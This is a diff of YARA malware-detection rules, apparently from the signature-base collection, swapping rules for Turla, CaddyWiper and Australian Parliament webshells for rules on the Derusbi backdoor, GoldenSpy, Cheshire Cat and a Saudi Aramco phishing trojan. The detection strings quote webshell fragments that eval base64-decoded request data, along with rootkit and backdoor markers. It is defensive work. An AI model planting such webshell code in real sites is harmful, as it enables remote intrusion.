 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c859310660603d0748cf17daea0799af7684f2a9f77f729871eb57338fbfcca6"
+		logic_hash = "61ef65a1500d3def3376a82bc376db451d202d18b03855ee279b6c01757deb2a"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		hash1 = "6ed939f59476fd31dc4d99e96136e928fbd88aec0d9c59846092c0e93a3c0e27"
 
 	strings:
-		$api0 = "GdiplusStartup"
-		$api1 = "GdipAlloc"
-		$api2 = "GdipCreateBitmapFromStreamICM"
-		$api3 = "GdipBitmapLockBits"
-		$api4 = "GdipGetImageWidth"
-		$api5 = "GdipGetImageHeight"
-		$api6 = "GdiplusShutdown"
-		$code32 = {
-            8B 46 3C               // mov     eax, [esi+3Ch]
-            B9 0B 01 00 00         // mov     ecx, 10Bh
-            66 39 4C 30 18         // cmp     [eax+esi+18h], cx
-            8B 44 30 28            // mov     eax, [eax+esi+28h]
-            6A 00                  // push    0
-            B9 AF BE AD DE         // mov     ecx, 0DEADBEAFh
-            51                     // push    ecx
-            51                     // push    ecx
-            03 C6                  // add     eax, esi
-            56                     // push    esi
-            FF D0                  // call eax
-        }
-		$code64 = {
-            48 63 43 3C            // movsxd rax, dword ptr [rbx+3Ch]
-            B9 0B 01 00 00         // mov ecx, 10Bh
-            BA AF BE AD DE         // mov edx, 0DEADBEAFh
-            66 39 4C 18 18         // cmp [rax+rbx+18h], cx
-            8B 44 18 28            // mov eax, [rax+rbx+28h]
-            45 33 C9               // xor r9d, r9d
-            44 8B C2               // mov r8d, edx
-            48 8B CB               // mov rcx, rbx
-            48 03 C3               // add rax, rbx
-            FF D0                  // call rax
-        }
+		$s1 = "LxMain"
+		$s2 = "execve"
+		$s3 = "kill"
+		$s4 = "cp -a %s %s"
+		$s5 = "%s &"
+		$s6 = "dbus-daemon"
+		$s7 = "--noprofile"
+		$s8 = "--norc"
+		$s9 = "TERM=vt100"
+		$s10 = "/proc/%u/cmdline"
+		$s11 = "loadso"
+		$s12 = "/proc/self/exe"
+		$s13 = "Proxy-Connection: Keep-Alive"
+		$s14 = "Connection: Keep-Alive"
+		$s15 = "CONNECT %s"
+		$s16 = "HOST: %s:%d"
+		$s17 = "User-Agent: Mozilla/4.0"
+		$s18 = "Proxy-Authorization: Basic %s"
+		$s19 = "Server: Apache"
+		$s20 = "Proxy-Authenticate"
+		$s21 = "gettimeofday"
+		$s22 = "pthread_create"
+		$s23 = "pthread_join"
+		$s24 = "pthread_mutex_init"
+		$s25 = "pthread_mutex_destroy"
+		$s26 = "pthread_mutex_lock"
+		$s27 = "getsockopt"
+		$s28 = "socket"
+		$s29 = "setsockopt"
+		$s30 = "select"
+		$s31 = "bind"
+		$s32 = "shutdown"
+		$s33 = "listen"
+		$s34 = "opendir"
+		$s35 = "readdir"
+		$s36 = "closedir"
+		$s37 = "rename"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and all of ( $api* ) and 1 of ( $code* )
+		uint32( 0 ) == 0x464c457f and all of them
 }
-
-rule SIGNATURE_BASE_Turla_Png_Reg_Enum_Payload : FILE
+rule SIGNATURE_BASE_Apt_Nix_Elf_Derusbi_Kernelmodule_1 : FILE
 {
 	meta:
-		description = "Payload that has most recently been dropped by the Turla PNG Dropper"
-		author = "Ben Humphrey"
-		id = "413bb315-3c01-56ab-92db-00342a11438a"
-		date = "2018-11-23"
-		modified = "2023-12-05"
-		reference = "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_png_dropper_nov18.yar#L51-L77"
+		description = "Detects Derusbi Backdoor ELF Kernel Module"
+		author = "Fidelis Cybersecurity"
+		id = "98196ffc-8a6f-5edc-a688-eeb449410b72"
+		date = "2016-02-29"
+		modified = "2023-05-04"
+		reference = "https://github.com/fideliscyber/indicators/tree/master/FTA-1021"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turbo_campaign.yar#L51-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b01d0c3a26ce955570ed5607514906bd8860f36637957e39a15f74a7dbb1a1e6"
+		logic_hash = "fab37e2dbe05c694da6e428aa922747b276c2827cbbd2b6c8002f0cc30c2870c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "fea27eb2e939e930c8617dcf64366d1649988f30555f6ee9cd09fe54e4bc22b3"
 
 	strings:
-		$crypt00 = "Microsoft Software Key Storage Provider" wide
-		$crypt01 = "ChainingModeCBC" wide
+		$s1 = "__this_module"
+		$s2 = "init_module"
+		$s3 = "unhide_pid"
+		$s4 = "is_hidden_pid"
+		$s5 = "clear_hidden_pid"
+		$s6 = "hide_pid"
+		$s7 = "license"
+		$s8 = "description"
+		$s9 = "srcversion="
+		$s10 = "depends="
+		$s12 = "vermagic="
+		$s13 = "current_task"
+		$s14 = "sock_release"
+		$s15 = "module_layout"
+		$s16 = "init_uts_ns"
+		$s17 = "init_net"
+		$s18 = "init_task"
+		$s19 = "filp_open"
+		$s20 = "__netlink_kernel_create"
+		$s21 = "kfree_skb"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and pe.imports ( "advapi32.dll" , "StartServiceCtrlDispatcherA" ) and pe.imports ( "advapi32.dll" , "RegEnumValueA" ) and pe.imports ( "advapi32.dll" , "RegEnumKeyExA" ) and pe.imports ( "ncrypt.dll" , "NCryptOpenStorageProvider" ) and pe.imports ( "ncrypt.dll" , "NCryptEnumKeys" ) and pe.imports ( "ncrypt.dll" , "NCryptOpenKey" ) and pe.imports ( "ncrypt.dll" , "NCryptDecrypt" ) and pe.imports ( "ncrypt.dll" , "BCryptGenerateSymmetricKey" ) and pe.imports ( "ncrypt.dll" , "BCryptGetProperty" ) and pe.imports ( "ncrypt.dll" , "BCryptDecrypt" ) and pe.imports ( "ncrypt.dll" , "BCryptEncrypt" ) and all of them
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SIGNATURE_BASE_MAL_WIPER_Caddywiper_Mar22_1 : FILE
+rule SIGNATURE_BASE_Apt_Nix_Elf_Derusbi_Linux_Sharedmemcreation_1 : FILE
 {
 	meta:
-		description = "Detects CaddyWiper malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "83495a0d-a295-5ec7-9761-ce79918e1034"
-		date = "2022-03-15"
+		description = "Detects Derusbi Backdoor ELF Shared Memory Creation"
+		author = "Fidelis Cybersecurity"
+		id = "068b7bea-853d-57e8-a9fe-8b451dbc7582"
+		date = "2016-02-29"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/ESETresearch/status/1503436420886712321?s=20&t=xh8JK6fEmRIrnqO7Ih_PNg"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ua_caddywiper.yar#L2-L22"
+		reference = "https://github.com/fideliscyber/indicators/tree/master/FTA-1021"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turbo_campaign.yar#L85-L96"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0d0278596010953e7068979c92a33dc0ace1bfa94979077412128d1ca756f834"
-		score = 85
+		logic_hash = "adbdccea9ea7aefcca18d659c027a49e7e2e053873b77ddaf369203b3e301033"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "1e87e9b5ee7597bdce796490f3ee09211df48ba1d11f6e2f5b255f05cc0ba176"
-		hash2 = "a294620543334a721a2ae8eaaf9680a0786f4b9a216d75b55cfd28f39e9430ea"
-		hash3 = "ea6a416b320f32261da8dafcf2faf088924f99a3a84f7b43b964637ea87aef72"
-		hash4 = "f1e8844dbfc812d39f369e7670545a29efef6764d673038b1c3edd11561d6902"
 
 	strings:
-		$op1 = { ff 55 94 8b 45 fc 50 ff 55 f8 8a 4d ba 88 4d ba 8a 55 ba 80 ea 01 }
-		$op2 = { 89 45 f4 83 7d f4 00 74 04 eb 47 eb 45 6a 00 8d 95 1c ff ff ff 52 }
-		$op3 = { 6a 20 6a 02 8d 4d b0 51 ff 95 68 ff ff ff 85 c0 75 0a e9 4e 02 00 00 }
-		$op4 = { e9 67 01 00 00 83 7d f4 05 74 0a e9 5c 01 00 00 e9 57 01 00 00 8d 45 98 50 6a 20 }
+		$byte1 = { B6 03 00 00 ?? 40 00 00 00 ?? 0D 5F 01 82 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and 3 of them or all of them
+		uint32( 0 ) == 0x464C457F and any of them
 }
-rule SIGNATURE_BASE_Windivert_Driver : FILE
+rule SIGNATURE_BASE_Apt_Nix_Elf_Derusbi_Linux_Strings_1 : FILE
 {
 	meta:
-		description = "Detects WinDivert User-Mode packet capturing driver"
-		author = "Florian Roth (Nextron Systems)"
-		id = "95e89577-bb5a-5391-9130-155746d4783f"
-		date = "2017-10-02"
+		description = "Detects Derusbi Backdoor ELF Strings"
+		author = "Fidelis Cybersecurity"
+		id = "06717cc9-678d-5912-a671-65605b9c9968"
+		date = "2016-02-29"
 		modified = "2023-12-05"
-		reference = "https://www.reqrypt.org/windivert.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_pua.yar#L1-L20"
+		reference = "https://github.com/fideliscyber/indicators/tree/master/FTA-1021"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turbo_campaign.yar#L98-L128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "db2933396e015e906114bd04f75a5b5caf0564494224f533a6e00c1fa5421568"
-		score = 40
-		quality = 85
+		logic_hash = "b54b406a562247d4c3d4a9c4d1b7584bdcecfe5b6c76867c04770e016eeb8c9a"
+		score = 75
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "33c657fa27b92cfcced66b331cfea7a880460a98cf037e4277faa1420fe59d1c"
-		hash2 = "9b834e8f9d117bf2c564a37434973dc0717270ebfac8d8251711905d18da3858"
-		hash3 = "5ef707ea68a9bd3a3e568793a0f7d66d166694801ada067d9ebac1d13e53153e"
-		hash4 = "df12afa691e529f01c75b3dd734f6b45bf1488dbf90ced218657f0d205bff319"
 
 	strings:
-		$s1 = "WinDivertDllEntry" fullword ascii
-		$s2 = "WinDivertHelperParseIPv4Address" fullword ascii
-		$s3 = "WinDivert (web: http://reqrypt.org/windivert.html)" fullword wide
+		$a1 = "loadso" wide ascii fullword
+		$a2 = "\nuname -a\n\n" wide ascii
+		$a3 = "/dev/shm/.x11.id" wide ascii
+		$a4 = "LxMain64" wide ascii nocase
+		$a5 = "# \\u@\\h:\\w \\$ " wide ascii
+		$b1 = "0123456789abcdefghijklmnopqrstuvwxyz" wide
+		$b2 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" wide
+		$b3 = "ret %d" wide fullword
+		$b4 = "uname -a\n\n" wide ascii
+		$b5 = "/proc/%u/cmdline" wide ascii
+		$b6 = "/proc/self/exe" wide ascii
+		$b7 = "cp -a %s %s" wide ascii
+		$c1 = "/dev/pts/4" wide ascii fullword
+		$c2 = "/tmp/1408.log" wide ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of them )
+		uint32( 0 ) == 0x464C457F and ( ( 1 of ( $a* ) and 4 of ( $b* ) ) or ( 1 of ( $a* ) and 1 of ( $c* ) ) or 2 of ( $a* ) or all of ( $b* ) )
 }
-rule SIGNATURE_BASE_SUSP_Certificate_Payload : FILE
+rule SIGNATURE_BASE_Apt_Win_Exe_Trojan_Derusbi_1 : FILE
 {
 	meta:
-		description = "Detects payloads that pretend to be certificates"
-		author = "Didier Stevens, Florian Roth"
-		id = "6f1fe410-591a-5a59-a683-67cad9777dfe"
-		date = "2018-08-02"
+		description = "Detects Derusbi Backdoor Win32"
+		author = "Fidelis Cybersecurity"
+		id = "6e7fecfa-f801-59b2-a394-df4c368011b7"
+		date = "2016-02-29"
 		modified = "2023-12-05"
-		reference = "https://blog.nviso.be/2018/08/02/powershell-inside-a-certificate-part-3/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cert_payloads.yar#L1-L22"
+		reference = "https://github.com/fideliscyber/indicators/tree/master/FTA-1021"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turbo_campaign.yar#L130-L189"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "909cf4209bbb876a042d86e017f65ce3764d2fde7a602406ed8531ba97c9fb9b"
-		score = 50
-		quality = 85
+		logic_hash = "02fb4da724b257aef0ec0fecfe5b7a25a23fe4dd5baae0ddd2d21350b9af34e9"
+		score = 75
+		quality = 83
 		tags = "FILE"
 
 	strings:
-		$re1 = "-----BEGIN CERTIFICATE-----"
-		$fp1 = "replace it with the PEM-encoded root certificate"
+		$sa_4 = "HOST: %s:%d"
+		$sa_6 = "User-Agent: Mozilla"
+		$sa_7 = "Proxy-Connection: Keep-Alive"
+		$sa_8 = "Connection: Keep-Alive"
+		$sa_9 = "Server: Apache"
+		$sa_12 = "ZwUnloadDriver"
+		$sa_13 = "ZwLoadDriver"
+		$sa_18 = "_time64"
+		$sa_19 = "DllRegisterServer"
+		$sa_20 = "DllUnregisterServer"
+		$sa_21 = { 8b [5] 8b ?? d3 ?? 83 ?? 08 30 [5] 40 3b [5] 72 }
+		$sb_1 = "PCC_CMD_PACKET"
+		$sb_2 = "PCC_CMD"
+		$sb_3 = "PCC_BASEMOD"
+		$sb_4 = "PCC_PROXY"
+		$sb_5 = "PCC_SYS"
+		$sb_6 = "PCC_PROCESS"
+		$sb_7 = "PCC_FILE"
+		$sb_8 = "PCC_SOCK"
+		$sc_1 = "bcdedit -set testsigning" wide ascii
+		$sc_2 = "update.microsoft.com" wide ascii
+		$sc_3 = "_crt_debugger_hook" wide ascii
+		$sc_4 = "ue8G5" wide ascii
+		$sd_2 = "\\\\.\\pipe\\%s" wide ascii
+		$sd_3 = ".dat" wide ascii
+		$sd_4 = "CONNECT %s:%d" wide ascii
+		$sd_5 = "\\Device\\" wide ascii
+		$se_1 = "-%s-%04d" wide ascii
+		$se_2 = "-%04d" wide ascii
+		$se_5 = "2.03" wide ascii
 
 	condition:
-		uint32( 0 ) == 0x2D2D2D2D and $re1 at 0 and not uint8( 29 ) == 0x4D and not uint8( 28 ) == 0x4D and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5A4D and ( all of ( $sa_* ) or ( ( 8 of ( $sa_* ) ) and ( ( 5 of ( $sb_* ) ) or ( 3 of ( $sc_* ) ) or ( all of ( $sd_* ) ) or ( 1 of ( $sc_* ) and all of ( $se_* ) ) ) ) )
 }
-rule SIGNATURE_BASE_APT_Webshell_Tiny_1 : FILE
+rule SIGNATURE_BASE_Saudi_Phish_Trojan : FILE
 {
 	meta:
-		description = "Detetcs a tiny webshell involved in the Australian Parliament House network compromise"
+		description = "Detects a trojan used in Saudi Aramco Phishing"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e65a8920-0684-5aae-a2b8-079c2beae08a"
-		date = "2019-02-18"
+		id = "d805391d-1256-5dac-8585-ccf3391d4e91"
+		date = "2017-10-12"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_aus_parl_compromise.yar#L12-L23"
+		reference = "https://goo.gl/Z3JUAA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_saudi_aramco_phish.yar#L10-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "277162f720195c94d36fd3350d0dda785007e8cc6ed2ab2aa1a6a6262f2993fa"
+		logic_hash = "f7199d2e408cc057d88234e4041c7d87652d1ed361eaaf75bb37da45900e9f38"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8ad94dc5d59aa1e9962c76fd5ca042e582566049a97aef9f5730ba779e5ebb91"
 
 	strings:
-		$x1 = "eval(" ascii wide
+		$s1 = { 7B 00 30 00 7D 00 7B 00 31 00 7D 00 5C 00 00 09
+               2E 00 64 00 6C 00 6C 00 00 11 77 00 33 00 77 00
+               70 00 2E 00 65 00 78 00 65 00 00 1B 61 00 73 00
+               70 00 6E 00 65 00 74 00 5F 00 77 00 70 00 2E 00
+               65 00 78 00 65 }
 
 	condition:
-		( uint16( 0 ) == 0x3f3c or uint16( 0 ) == 0x253c ) and filesize < 40 and $x1
+		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_Webshell_AUS_Tiny_2 : FILE
+rule SIGNATURE_BASE_APT_MAL_BKA_Goldenspy_Aug20_1 : FILE
 {
 	meta:
-		description = "Detetcs a tiny webshell involved in the Australian Parliament House network compromise"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4746d4ce-628a-59b0-9032-7e0759d96ad3"
-		date = "2019-02-18"
+		description = "Detects variants of GoldenSpy Malware"
+		author = "BKA"
+		id = "4f47087e-6e68-53ff-9446-72a1751da359"
+		date = "2020-08-21"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_aus_parl_compromise.yar#L25-L38"
+		reference = "https://www.bka.de/SharedDocs/Kurzmeldungen/DE/Warnhinweise/200821_Cyberspionage.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_goldenspy.yar#L1-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e26c265d2b1606257d8c843921601f14cae2beaf246f8e37daeeb6c5ff12f289"
+		logic_hash = "ba81a2b081842aaf06bbf623640a87946894df83fd0d7b7149c48afa8ed0a081"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "0d6209d86f77a0a69451b0f27b476580c14e0cda15fa6a5003aab57a93e7e5a5"
 
 	strings:
-		$x1 = "Request.Item[System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(\"[password]\"))];" ascii
-		$x2 = "eval(arguments,System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(\"" ascii
+		$str01 = {c78510ffffff00000000 c78514ffffff0f000000 c68500ffffff00 c78528ffffff00000000 c7852cffffff0f000000 c68518ffffff00 c78540ffffff00000000 c78544ffffff0f000000 c68530ffffff00 c645fc14 80bd04feffff00}
+		$str02 = "Ryeol HTTP Client Class" ascii
+		$str03 = "----RYEOL-FB3B405B7EAE495aB0C0295C54D4E096-" ascii
+		$str04 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\fwkp.exe" ascii
+		$str05 = "svmm" ascii
+		$str06 = "PROTOCOL_" ascii
+		$str07 = "softList" ascii
+		$str08 = "excuteExe" ascii
 
 	condition:
-		( uint16( 0 ) == 0x3f3c or uint16( 0 ) == 0x253c ) and filesize < 1KB and 1 of them
+		uint16( 0 ) == 0x5A4D and 5 of ( $str* )
 }
-rule SIGNATURE_BASE_APT_Webshell_AUS_Jscript_3 : FILE
+rule SIGNATURE_BASE_Cheshirecat_Sample2 : FILE
 {
 	meta:
-		description = "Detetcs a webshell involved in the Australian Parliament House network compromise"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ff7e780b-ccf9-53b6-b741-f04a8cbaf580"
-		date = "2019-02-18"
+		id = "14448138-0af3-5669-8aa3-f9e773e2a008"
+		date = "2015-08-08"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_aus_parl_compromise.yar#L40-L53"
+		reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cheshirecat.yar#L11-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e144e555dd80e15ac9072a645e629a86ca1a6b52949d236ec3daedbf06bd6718"
-		score = 75
+		hash = "dc18850d065ff6a8364421a9c8f9dd5fcce6c7567f4881466cee00e5cd0c7aa8"
+		logic_hash = "4dd299cfe36545dba5ccac22d2eedc405f548fe5f976514d1cfa8238b472782c"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "7ac6f973f7fccf8c3d58d766dec4ab7eb6867a487aa71bc11d5f05da9322582d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<%@ Page Language=\"Jscript\" validateRequest=\"false\"%><%try{eval(System.Text.Encoding.UTF8.GetString(Convert.FromBase64String" ascii
-		$s2 = ".Item[\"[password]\"])),\"unsafe\");}" ascii
+		$s0 = "mpgvwr32.dll" fullword ascii
+		$s1 = "Unexpected failure of wait! (%d)" fullword ascii
+		$s2 = "\"%s\" /e%d /p%s" fullword ascii
+		$s4 = "error in params!" fullword ascii
+		$s5 = "sscanf" fullword ascii
+		$s6 = "<>Param : 0x%x" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x6568 and filesize < 1KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 4 of ( $s* )
 }
-rule SIGNATURE_BASE_APT_Webshell_AUS_4 : FILE
+rule SIGNATURE_BASE_Cheshirecat_Gen1 : FILE
 {
 	meta:
-		description = "Detetcs a webshell involved in the Australian Parliament House network compromise"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bb5b10d1-3528-5361-92fc-8440c65dcda4"
-		date = "2019-02-18"
+		id = "2068feed-2101-5b12-9e36-db7b0f5cc4ec"
+		date = "2015-08-08"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_aus_parl_compromise.yar#L56-L71"
+		reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cheshirecat.yar#L35-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4a4f26b50631021979e4a8246a1e1c10150f4fb03eb7d77a1042e41ef57b3961"
-		score = 75
+		logic_hash = "d1bbda9340bc2d2fcefd6bf9a3c30fe0b99c66fb978b3a4583f17c521cfcf4b0"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		hash1 = "83321c02339bb51735fbcd9a80c056bd3b89655f3dc41e5fef07ca46af09bb71"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300"
+		hash2 = "32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a"
+		hash3 = "63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb"
+		hash4 = "c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532"
 
 	strings:
-		$s1 = "wProxy.Credentials = new System.Net.NetworkCredential(pusr, ppwd);" fullword ascii
-		$s2 = "{return System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(" ascii
-		$s3 = ".Equals('User-Agent', StringComparison.OrdinalIgnoreCase))" ascii
-		$s4 = "gen.Emit(System.Reflection.Emit.OpCodes.Ret);" fullword ascii
+		$x1 = "CAPESPN.DLL" fullword wide
+		$x2 = "WINF.DLL" fullword wide
+		$x3 = "NCFG.DLL" fullword wide
+		$x4 = "msgrthlp.dll" fullword wide
+		$x5 = "Local\\{c0d9770c-9841-430d-b6e3-575dac8a8ebf}" fullword ascii
+		$x6 = "Local\\{1ef9f94a-5664-48a6-b6e8-c3748db459b4}" fullword ascii
+		$a1 = "Interface\\%s\\info" fullword ascii
+		$a2 = "Interface\\%s\\info\\%s" fullword ascii
+		$a3 = "CLSID\\%s\\info\\%s" fullword ascii
+		$a4 = "CLSID\\%s\\info" fullword ascii
+		$b1 = "Windows Shell Icon Handler" fullword wide
+		$b2 = "Microsoft Shell Icon Handler" fullword wide
+		$s1 = "\\StringFileInfo\\%s\\FileVersion" ascii
+		$s2 = "CLSID\\%s\\AuxCLSID" fullword ascii
+		$s3 = "lnkfile\\shellex\\IconHandler" fullword ascii
+		$s4 = "%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu GMT" fullword ascii
+		$s5 = "%sMutex" fullword ascii
+		$s6 = "\\ShellIconCache" ascii
+		$s7 = "+6Service Pack " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x7566 and filesize < 10KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 350KB and 7 of ( $s* ) and 2 of ( $a* ) and 1 of ( $b* ) and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_APT_Script_AUS_4 : FILE
+rule SIGNATURE_BASE_Cheshirecat_Gen2 : FILE
 {
 	meta:
-		description = "Detetcs a script involved in the Australian Parliament House network compromise"
+		description = "Cheshire Cat Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5cbf2476-5ce8-540d-b87b-e400daf49b43"
-		date = "2019-02-18"
+		id = "b97b20bd-f6b9-512f-ba99-6c38ba7853be"
+		date = "2015-08-08"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_aus_parl_compromise.yar#L73-L90"
+		reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cheshirecat.yar#L76-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3a81365572380964abe07a1ec16a9ea299bf16a4e624285faaa6f72c44f762d2"
-		score = 75
-		quality = 83
+		logic_hash = "3c5d6ce6cc09c416d3449f7f5fc09139ce9271b69d743832b4b2548682e4ddf1"
+		score = 70
+		quality = 85
 		tags = "FILE"
-		hash1 = "fdf15f388a511a63fbad223e6edb259abdd4009ec81fcc87ce84f0f2024c8057"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300"
+		hash2 = "32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a"
+		hash3 = "63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb"
+		hash4 = "c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532"
 
 	strings:
-		$x1 = "myMutex = CreateMutex(0, 1, \"teX23stNew\")" fullword ascii
-		$x2 = "mmpath = Environ(appdataPath) & \"\\\" & \"Microsoft\" & \"\\\" & \"mm.accdb\"" fullword ascii
-		$x3 = "Dim mmpath As String, newmmpath  As String, appdataPath As String" fullword ascii
-		$x4 = "'MsgBox \"myMutex Created\" Do noting" fullword ascii
-		$x5 = "appdataPath = \"app\" & \"DatA\"" fullword ascii
-		$x6 = ".DoCmd.Close , , acSaveYes" fullword ascii
+		$a1 = "Interface\\%s\\info" fullword ascii
+		$a2 = "Interface\\%s\\info\\%s" fullword ascii
+		$a3 = "CLSID\\%s\\info\\%s" fullword ascii
+		$a4 = "CLSID\\%s\\info" fullword ascii
+		$b1 = "Windows Shell Icon Handler" fullword wide
+		$b2 = "Microsoft Shell Icon Handler" fullword wide
+		$s1 = "\\StringFileInfo\\%s\\FileVersion" ascii
+		$s2 = "CLSID\\%s\\AuxCLSID" fullword ascii
+		$s3 = "lnkfile\\shellex\\IconHandler" fullword ascii
+		$s4 = "%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu GMT" fullword ascii
+		$s5 = "%sMutex" fullword ascii
+		$s6 = "\\ShellIconCache" ascii
+		$s7 = "+6Service Pack " fullword ascii
 
 	condition:
-		filesize < 7KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 7 of ( $s* ) and 2 of ( $a* ) and 1 of ( $b* )
 }
-rule SIGNATURE_BASE_APT_Webshell_AUS_5 : FILE
